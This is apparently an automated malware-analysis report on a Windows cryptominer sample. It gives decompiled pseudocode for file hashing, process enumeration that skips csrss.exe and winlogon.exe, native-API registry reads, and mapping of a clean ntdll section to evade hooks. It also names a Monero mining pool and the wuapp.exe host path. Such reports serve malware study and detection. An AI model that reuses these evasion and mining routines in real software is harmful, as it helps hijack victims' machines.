			E00408B20(char _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				void* _t40;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
                                                                                                                                          				signed int _t73;
                                                                                                                                          				signed int _t75;
                                                                                                                                          				intOrPtr _t80;
                                                                                                                                          				void* _t82;
                                                                                                                                          				void* _t87;
                                                                                                                                          
                                                                                                                                          				asm("movups xmm0, [0x40aa14]");
                                                                                                                                          				_t39 =  *0x40aa24; // 0x0
                                                                                                                                          				_t1 =  &_a4; // 0x40363e
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				_v16 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				asm("movups [ebp-0x24], xmm0");
                                                                                                                                          				_v24 = _t39;
                                                                                                                                          				_t40 = CreateFileW( *_t1, 0x80000000, 1, 0, 3, 0x8000000, 0); // executed
                                                                                                                                          				_t82 = _t40;
                                                                                                                                          				if(_t82 == 0xffffffff) {
                                                                                                                                          					L3:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t42 =  &_v8;
                                                                                                                                          					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000); // executed
                                                                                                                                          					if(_t42 != 0) {
                                                                                                                                          						_t43 =  &_v12;
                                                                                                                                          						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43); // executed
                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                          							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed
                                                                                                                                          							if(_t46 == 0) {
                                                                                                                                          								L11:
                                                                                                                                          								_push(0);
                                                                                                                                          								goto L12;
                                                                                                                                          							} else {
                                                                                                                                          								_t69 = __imp__CryptHashData;
                                                                                                                                          								while(1) {
                                                                                                                                          									_t72 = _v16;
                                                                                                                                          									if(_t72 == 0) {
                                                                                                                                          										break;
                                                                                                                                          									}
                                                                                                                                          									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
                                                                                                                                          									_push(0);
                                                                                                                                          									if(_t60 == 0) {
                                                                                                                                          										L12:
                                                                                                                                          										CryptReleaseContext(_v8);
                                                                                                                                          										__imp__CryptDestroyHash(_v12);
                                                                                                                                          										CloseHandle(_t82);
                                                                                                                                          										L13:
                                                                                                                                          										return 0;
                                                                                                                                          									} else {
                                                                                                                                          										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??); // executed
                                                                                                                                          										if(_t46 != 0) {
                                                                                                                                          											continue;
                                                                                                                                          										} else {
                                                                                                                                          											goto L11;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          									goto L20;
                                                                                                                                          								}
                                                                                                                                          								if(_t46 == 0) {
                                                                                                                                          									goto L11;
                                                                                                                                          								} else {
                                                                                                                                          									_v20 = 0x10;
                                                                                                                                          									_t51 =  &_v56;
                                                                                                                                          									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
                                                                                                                                          									if(_t51 == 0) {
                                                                                                                                          										goto L13;
                                                                                                                                          									} else {
                                                                                                                                          										_t70 = _v20;
                                                                                                                                          										_t75 = 0;
                                                                                                                                          										if(_t70 != 0) {
                                                                                                                                          											_t80 = _a8;
                                                                                                                                          											asm("o16 nop [eax+eax]");
                                                                                                                                          											do {
                                                                                                                                          												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
                                                                                                                                          												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
                                                                                                                                          												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
                                                                                                                                          												_t75 = _t75 + 1;
                                                                                                                                          											} while (_t75 < _t70);
                                                                                                                                          										}
                                                                                                                                          										__imp__CryptDestroyHash(_v12);
                                                                                                                                          										CryptReleaseContext(_v8, 0);
                                                                                                                                          										FindCloseChangeNotification(_t82); // executed
                                                                                                                                          										return 1;
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							CloseHandle(_t82);
                                                                                                                                          							CryptReleaseContext(_v8, 0);
                                                                                                                                          							return 0;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						CloseHandle(_t82);
                                                                                                                                          						goto L3;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L20:
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNELBASE(>6@,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408B6E
                                                                                                                                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00408B8A
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408B95
                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00408BB2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408BBD
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00408BC8
                                                                                                                                          • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408BF0
                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00408C14
                                                                                                                                          • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408C2D
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408C38
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408C41
                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00408C48
                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 00408C71
                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408CB6
                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408CC1
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00408CC8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Crypt$Hash$CloseContext$FileHandleRelease$CreateDestroyRead$AcquireChangeDataFindNotificationParam
                                                                                                                                          • String ID: >6@
                                                                                                                                          • API String ID: 2963825918-779403629
                                                                                                                                          • Opcode ID: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                                                          • Instruction ID: c20e288969fc02838bc95c2aa2b6e857bba7efe27eb6bc48cd55eb8ba344291c
                                                                                                                                          • Opcode Fuzzy Hash: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                                                          • Instruction Fuzzy Hash: 2751B271A01219BBEB209FA4DE45FEE7BB8EF48300F104075FA44B51E1DB75AE458B68
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                          			E004080E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                          				char _v272;
                                                                                                                                          				intOrPtr _v300;
                                                                                                                                          				void* _v308;
                                                                                                                                          				void* _t30;
                                                                                                                                          				struct HINSTANCE__* _t31;
                                                                                                                                          				void* _t34;
                                                                                                                                          				int _t37;
                                                                                                                                          				struct HINSTANCE__* _t39;
                                                                                                                                          				int _t45;
                                                                                                                                          				void* _t49;
                                                                                                                                          				void* _t51;
                                                                                                                                          				void* _t55;
                                                                                                                                          				void* _t57;
                                                                                                                                          				void* _t61;
                                                                                                                                          				intOrPtr* _t62;
                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                          				signed int _t69;
                                                                                                                                          				void* _t72;
                                                                                                                                          
                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                          					return E00407EF0("explorer.exe");
                                                                                                                                          				} else {
                                                                                                                                          					_t69 = 0;
                                                                                                                                          					_v308 = 0x128;
                                                                                                                                          					_a4 = 0;
                                                                                                                                          					_t30 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                          					_t61 = _t30;
                                                                                                                                          					_v8 = _t61;
                                                                                                                                          					if(_t61 != 0xffffffff) {
                                                                                                                                          						_t66 = 0;
                                                                                                                                          						_t31 = LoadLibraryA("kernel32.dll");
                                                                                                                                          						_v12 = _t31;
                                                                                                                                          						if(_t31 != 0) {
                                                                                                                                          							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
                                                                                                                                          						}
                                                                                                                                          						Process32First(_t61,  &_v308); // executed
                                                                                                                                          						_t34 = E00408DD0();
                                                                                                                                          						_t62 = _a8;
                                                                                                                                          						if(_t34 == 0 || _t66 == 0) {
                                                                                                                                          							L10:
                                                                                                                                          							_t69 = 1;
                                                                                                                                          							 *_t62 = _v300;
                                                                                                                                          						} else {
                                                                                                                                          							 *_t66(_v300,  &_a4);
                                                                                                                                          							if(_a4 != _t69) {
                                                                                                                                          								_t55 = E00401740("csrss.exe",  &_v272);
                                                                                                                                          								_t72 = _t72 + 8;
                                                                                                                                          								if(_t55 != 0) {
                                                                                                                                          									_t57 = E00401740("winlogon.exe",  &_v272);
                                                                                                                                          									_t72 = _t72 + 8;
                                                                                                                                          									if(_t57 != 0) {
                                                                                                                                          										goto L10;
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          						_t37 = Process32Next(_v8,  &_v308); // executed
                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                          							do {
                                                                                                                                          								if(E00408DD0() == 0 || _t66 == 0) {
                                                                                                                                          									L18:
                                                                                                                                          									 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
                                                                                                                                          									_t69 = _t69 + 1;
                                                                                                                                          									if(_t69 < _a12) {
                                                                                                                                          										goto L19;
                                                                                                                                          									}
                                                                                                                                          								} else {
                                                                                                                                          									 *_t66(_v300,  &_a4); // executed
                                                                                                                                          									if(_a4 == 0) {
                                                                                                                                          										goto L19;
                                                                                                                                          									} else {
                                                                                                                                          										_t49 = E00401740("csrss.exe",  &_v272);
                                                                                                                                          										_t72 = _t72 + 8;
                                                                                                                                          										if(_t49 == 0) {
                                                                                                                                          											goto L19;
                                                                                                                                          										} else {
                                                                                                                                          											_t51 = E00401740("winlogon.exe",  &_v272);
                                                                                                                                          											_t72 = _t72 + 8;
                                                                                                                                          											if(_t51 == 0) {
                                                                                                                                          												goto L19;
                                                                                                                                          											} else {
                                                                                                                                          												goto L18;
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          								goto L20;
                                                                                                                                          								L19:
                                                                                                                                          								_t45 = Process32Next(_v8,  &_v308); // executed
                                                                                                                                          							} while (_t45 != 0);
                                                                                                                                          						}
                                                                                                                                          						L20:
                                                                                                                                          						CloseHandle(_v8);
                                                                                                                                          						_t39 = _v12;
                                                                                                                                          						if(_t39 != 0) {
                                                                                                                                          							FreeLibrary(_t39);
                                                                                                                                          						}
                                                                                                                                          						return _t69;
                                                                                                                                          					} else {
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}
                                                                                                                                          0x004080ed
                                                                                                                                          0x00408261
                                                                                                                                          0x004080f3
                                                                                                                                          0x004080f5
                                                                                                                                          0x004080f7
                                                                                                                                          0x00408104
                                                                                                                                          0x00408107
                                                                                                                                          0x0040810c
                                                                                                                                          0x0040810e
                                                                                                                                          0x00408114
                                                                                                                                          0x00408124
                                                                                                                                          0x00408126
                                                                                                                                          0x0040812c
                                                                                                                                          0x00408131
                                                                                                                                          0x0040813f
                                                                                                                                          0x0040813f
                                                                                                                                          0x00408149
                                                                                                                                          0x0040814e
                                                                                                                                          0x00408153
                                                                                                                                          0x00408158
                                                                                                                                          0x0040819f
                                                                                                                                          0x004081a5
                                                                                                                                          0x004081aa
                                                                                                                                          0x0040815e
                                                                                                                                          0x00408168
                                                                                                                                          0x0040816d
                                                                                                                                          0x0040817b
                                                                                                                                          0x00408180
                                                                                                                                          0x00408185
                                                                                                                                          0x00408193
                                                                                                                                          0x00408198
                                                                                                                                          0x0040819d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040819d
                                                                                                                                          0x00408185
                                                                                                                                          0x0040816d
                                                                                                                                          0x004081b6
                                                                                                                                          0x004081bd
                                                                                                                                          0x004081c0
                                                                                                                                          0x004081c7
                                                                                                                                          0x0040820f
                                                                                                                                          0x00408215
                                                                                                                                          0x00408218
                                                                                                                                          0x0040821c
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408107
                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,004067D1,00000002,00000000,74B5F7F0,00000000), ref: 00408126
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 00408139
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00408149
                                                                                                                                          • Process32Next.KERNEL32 ref: 004081B6
                                                                                                                                          • ProcessIdToSessionId.KERNELBASE(?,00000000,00001000,00000128,00000000,00000128), ref: 004081D7
                                                                                                                                          • Process32Next.KERNEL32 ref: 00408228
                                                                                                                                          • CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 00408234
                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00408243
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcProcessSessionSnapshotToolhelp32
                                                                                                                                          • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                                                          • API String ID: 1815987945-4289567422
                                                                                                                                          • Opcode ID: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                                                          • Instruction ID: e2503db8604718d0b55e8117c492ad94a53ae061e857ffc76dcc057c8b58004a
                                                                                                                                          • Opcode Fuzzy Hash: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                                                          • Instruction Fuzzy Hash: FC41A8759002186BDF10AF60DE41BEA77A8AF54345F0001BEFD44F62C1EF398E51CA99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                          			E004037E0(void* __eflags, char _a4) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				long _v16;
                                                                                                                                          				long _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				char _v32;
                                                                                                                                          				long _v36;
                                                                                                                                          				void* _v40;
                                                                                                                                          				long _v44;
                                                                                                                                          				long _v48;
                                                                                                                                          				long _v52;
                                                                                                                                          				long _v56;
                                                                                                                                          				intOrPtr _v60;
                                                                                                                                          				char* _v64;
                                                                                                                                          				long _v68;
                                                                                                                                          				void* _v72;
                                                                                                                                          				void* _t35;
                                                                                                                                          				long* _t45;
                                                                                                                                          				void* _t50;
                                                                                                                                          				intOrPtr _t59;
                                                                                                                                          				void* _t60;
                                                                                                                                          
                                                                                                                                          				_t1 =  &_a4; // 0x40476c
                                                                                                                                          				_t59 =  *_t1;
                                                                                                                                          				_t35 = E00407ED0(_t59); // executed
                                                                                                                                          				if(_t35 == 0) {
                                                                                                                                          					L11:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_push(0);
                                                                                                                                          					_push(0);
                                                                                                                                          					_v8 = 0;
                                                                                                                                          					asm("xorps xmm0, xmm0");
                                                                                                                                          					_v72 = 0;
                                                                                                                                          					_push( &_v32);
                                                                                                                                          					_push(_t59);
                                                                                                                                          					asm("movups [ebp-0x40], xmm0");
                                                                                                                                          					_v52 = 0;
                                                                                                                                          					_v24 = 0;
                                                                                                                                          					_v20 = 0;
                                                                                                                                          					_v16 = 0;
                                                                                                                                          					_v12 = 0;
                                                                                                                                          					_v40 = 0;
                                                                                                                                          					_v36 = 0;
                                                                                                                                          					_v48 = 0;
                                                                                                                                          					_v44 = 0;
                                                                                                                                          					asm("movq [ebp-0x1c], xmm0");
                                                                                                                                          					if( *0x5d10b8() != 1) {
                                                                                                                                          						goto L11;
                                                                                                                                          					} else {
                                                                                                                                          						_v72 = 0x18;
                                                                                                                                          						_v64 =  &_v32;
                                                                                                                                          						_v68 = 0;
                                                                                                                                          						_v60 = 0x40;
                                                                                                                                          						_v56 = 0;
                                                                                                                                          						_v52 = 0;
                                                                                                                                          						if(NtCreateFile( &_v8, 0x120089,  &_v72,  &_v24,  &_v40, 0x80, 3, 1, 0x60, 0, 0) != 0) {
                                                                                                                                          							goto L11;
                                                                                                                                          						} else {
                                                                                                                                          							_t45 =  &_v16;
                                                                                                                                          							__imp__GetFileSizeEx(_v8, _t45);
                                                                                                                                          							if(_t45 == 0 || _v16 != 0xcc8 || _v12 != 0) {
                                                                                                                                          								L10:
                                                                                                                                          								NtClose(_v8);
                                                                                                                                          								goto L11;
                                                                                                                                          							} else {
                                                                                                                                          								_t60 = VirtualAlloc(0, 0xcc8, 0x3000, 4);
                                                                                                                                          								if(_t60 == 0) {
                                                                                                                                          									goto L10;
                                                                                                                                          								} else {
                                                                                                                                          									_t50 =  *0x5d10bc(_v8, 0, 0, 0,  &_v24, _t60, _v16,  &_v48, 0);
                                                                                                                                          									_push(_v8);
                                                                                                                                          									if(_t50 == 0) {
                                                                                                                                          										NtClose();
                                                                                                                                          										E00401640("xmr-us-east1.nanopool.org:14444", _t60, 0xcc8);
                                                                                                                                          										E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
                                                                                                                                          										VirtualFree(_t60, 0, 0x8000);
                                                                                                                                          										return 1;
                                                                                                                                          									} else {
                                                                                                                                          										NtClose();
                                                                                                                                          										VirtualFree(_t60, 0, 0x8000);
                                                                                                                                          										return 0;
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(lG@,?,00000000,00000000), ref: 0040385D
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 004038B8
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 004038CD
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 00403900
                                                                                                                                          • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000CC8,00000000,00000000), ref: 00403927
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403934
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403942
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 0040394F
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403986
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403999
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseVirtual$FreePath$AllocAttributesCreateNameName_ReadSize
                                                                                                                                          • String ID: 0125789244697858$@$lG@$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 27938546-2795650337
                                                                                                                                          • Opcode ID: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                                                          • Instruction ID: 5038ae2be3a5952dc9e1581431ce3c004cda8172756abbfe488321c7fd1decdf
                                                                                                                                          • Opcode Fuzzy Hash: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                                                          • Instruction Fuzzy Hash: AF413DB0E41218BBEB209F94DD0AFDEBBB8AB04715F104167F504B52C0D7B95A488BA9
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                          			E004085B0(void* __ecx, void* __eflags, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				void* _v16;
                                                                                                                                          				void* _v24;
                                                                                                                                          				intOrPtr _v28;
                                                                                                                                          				intOrPtr _v32;
                                                                                                                                          				intOrPtr _v36;
                                                                                                                                          				intOrPtr _v40;
                                                                                                                                          				intOrPtr _v44;
                                                                                                                                          				void* _v48;
                                                                                                                                          				intOrPtr _v240;
                                                                                                                                          				void _v248;
                                                                                                                                          				char _v1272;
                                                                                                                                          				short _v3320;
                                                                                                                                          				long _t35;
                                                                                                                                          				long _t53;
                                                                                                                                          				long _t58;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				E00401BB0( &_v3320, 0, 0x800);
                                                                                                                                          				_t35 = _a4;
                                                                                                                                          				if(_t35 != 0x80000002) {
                                                                                                                                          					if(_t35 != 0x80000001) {
                                                                                                                                          						goto L8;
                                                                                                                                          					} else {
                                                                                                                                          						E00401BB0( &_v1272, 0, 0x400);
                                                                                                                                          						if(E004082B0( &_v1272) == 0) {
                                                                                                                                          							goto L8;
                                                                                                                                          						} else {
                                                                                                                                          							E00401A00( &_v3320, L"\\Registry\\User\\");
                                                                                                                                          							E00401970( &_v3320,  &_v1272);
                                                                                                                                          							goto L5;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					E00401A00( &_v3320, L"\\Registry\\Machine");
                                                                                                                                          					L5:
                                                                                                                                          					E00401970( &_v3320, _a8);
                                                                                                                                          					asm("xorps xmm0, xmm0");
                                                                                                                                          					asm("movq [ebp-0xc], xmm0");
                                                                                                                                          					RtlInitUnicodeString( &_v16,  &_v3320);
                                                                                                                                          					_v48 = 0x18;
                                                                                                                                          					_v40 =  &_v16;
                                                                                                                                          					_v44 = 0;
                                                                                                                                          					_v36 = 0x40;
                                                                                                                                          					_v32 = 0;
                                                                                                                                          					_v28 = 0;
                                                                                                                                          					_t53 = NtOpenKey( &_v8, 0x20119,  &_v48); // executed
                                                                                                                                          					if(_t53 < 0) {
                                                                                                                                          						L8:
                                                                                                                                          						return 0;
                                                                                                                                          					} else {
                                                                                                                                          						asm("xorps xmm0, xmm0");
                                                                                                                                          						asm("movq [ebp-0x14], xmm0");
                                                                                                                                          						RtlInitUnicodeString( &_v24, _a12);
                                                                                                                                          						_t58 = NtQueryValueKey(_v8,  &_v24, 1,  &_v248, 0xc8,  &_a4); // executed
                                                                                                                                          						_push(_v8);
                                                                                                                                          						if(_t58 >= 0) {
                                                                                                                                          							NtClose();
                                                                                                                                          							E00401A00(_a16, _v240 +  &_v248);
                                                                                                                                          							return 1;
                                                                                                                                          						} else {
                                                                                                                                          							NtClose();
                                                                                                                                          							goto L8;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 00408677
                                                                                                                                          • NtOpenKey.NTDLL(00000000,00020119,00000018), ref: 004086B3
                                                                                                                                          • RtlInitUnicodeString.NTDLL(74B04D40,00000000), ref: 004086CC
                                                                                                                                          • NtQueryValueKey.NTDLL(00000000,74B04D40,00000001,?,000000C8,00404596), ref: 004086EB
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004086F8
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00408704
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseInitStringUnicode$OpenQueryValue
                                                                                                                                          • String ID: @$\Registry\Machine$\Registry\User\
                                                                                                                                          • API String ID: 2538698014-2338602205
                                                                                                                                          • Opcode ID: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                                                          • Instruction ID: d2628628a94712c675b0c195a5174935581fdd4bc81ba0214100a7ffc09d6dc1
                                                                                                                                          • Opcode Fuzzy Hash: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                                                          • Instruction Fuzzy Hash: 1C412FB1D4020EABDB10DBA0CD45FEE77BCAF14308F1045B6F904F2191EB799A589B59
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E00402E40(void* __ecx, intOrPtr _a4, void* _a8) {
                                                                                                                                          				intOrPtr _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				intOrPtr _v16;
                                                                                                                                          				short _v18;
                                                                                                                                          				char _v20;
                                                                                                                                          				long _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				intOrPtr _v32;
                                                                                                                                          				char* _v36;
                                                                                                                                          				long _v40;
				void* _v44;
				short _t35;
				long _t41;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;

				// Returns the base of a private, read-only view of the section named by _a4 (a wide string; the
				// name itself is not visible on this page) and caches it in *0x5d1134. The usual purpose of this
				// pattern is a clean copy of a system DLL from a \KnownDlls section, untouched by user-mode hooks.
				// NtOpenSection/NtMapViewOfSection/NtClose are resolved from ntdll's export table, not imported.
				_t54 = __ecx;
				_v12 = 0; // ViewSize = 0: map the whole section
				if(_a8 != 0) {
					 *0x5d1134 = 0; // _a8 != 0 forces a fresh mapping; _a8 is then reused as the section handle
					goto L4;
				} else {
					_t48 =  *0x5d1134; // 0x2f90000
					if(_t48 == 0) {
						L4:
						// PEB (fs:[0x30]) -> Ldr (+0xc) -> InMemoryOrderModuleList (+0x14) -> second entry, which is
						// ntdll.dll right after the main image -> DllBase (+0x18 of the entry, +0x10 from its links)
						_t62 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))) + 0x10);
						if(_t62 != 0) {
							// E00402F80 resolves an export by name from the ntdll image found above (body not shown here)
							_v8 = E00402F80(_t54, _t62, "NtOpenSection");
							_t50 = E00402F80(_t54, _t62, "NtMapViewOfSection");
							_t57 = E00402F80(_t54, _t62, "NtClose");
							if(_v8 == 0 || _t50 == 0) {
								L12:
								return 0;
							} else {
								_t55 = _a4;
								_v16 = _a4; // UNICODE_STRING.Buffer = section name
								_t35 = (E00401B40(_a4) & 0x0000ffff) + (E00401B40(_a4) & 0x0000ffff); // 2 * character count = byte length (E00401B40 presumably wcslen)
								_v44 = 0x18; // OBJECT_ATTRIBUTES.Length (sizeof on x86)
								_v20 = _t35; // UNICODE_STRING.Length
								_v18 = _t35; // UNICODE_STRING.MaximumLength
								_v36 =  &_v20; // ObjectName
								_v40 = 0; // RootDirectory
								_v32 = 0x40; // OBJ_CASE_INSENSITIVE
								_v28 = 0; // SecurityDescriptor
								_v24 = 0; // SecurityQualityOfService
								// 0xc = SECTION_MAP_READ | SECTION_MAP_EXECUTE; the section handle lands in _a8
								if(NtOpenSection( &_a8, 0xc,  &_v44) >= 0) {
									// current process (-1), base chosen by the kernel (*0x5d1134 == 0), ViewShare (1), PAGE_READONLY (2)
									_t41 = NtMapViewOfSection(_a8, 0xffffffff, 0x5d1134, 0, 0, 0,  &_v12, 1, 0, 2); // executed
									_push(_a8);
									if(_t41 >= 0) {
										if( *0x5d1134 == 0) {
											goto L11;
										} else {
											NtClose(); // section handle closed; the view stays mapped
											_t44 =  *0x5d1134; // 0x2f90000
											return _t44;
										}
									} else {
										L11:
										 *_t57(); // NtClose via the resolved pointer, handle pushed above
										goto L12;
									}
								} else {
									E00402DD0(_t55); // not shown here
									 *0x5d1134 = _t62; // fall back to the ntdll image the loader already mapped
									return _t62;
								}
							}
						} else {
							return 0;
						}
					} else {
						return _t48; // cached view base
					}
				}
			}

Instruction address column for the pseudocode above (one entry per line; alignment with the lines was lost in extraction):
0x00402e40 0x00402e4a 0x00402e51 0x00402e60 0x00000000 0x00402e53 0x00402e53 0x00402e5a
0x00402e6a 0x00402e79 0x00402e7e 0x00402e9a 0x00402ea8 0x00402eb2 0x00402eb8 0x00402f55
0x00402f5d 0x00402ec6 0x00402ec6 0x00402eca 0x00402ed8 0x00402eda 0x00402ee1 0x00402ee5
0x00402eec 0x00402ef8 0x00402f00 0x00402f07 0x00402f0e 0x00402f1a 0x00402f4a 0x00402f4c
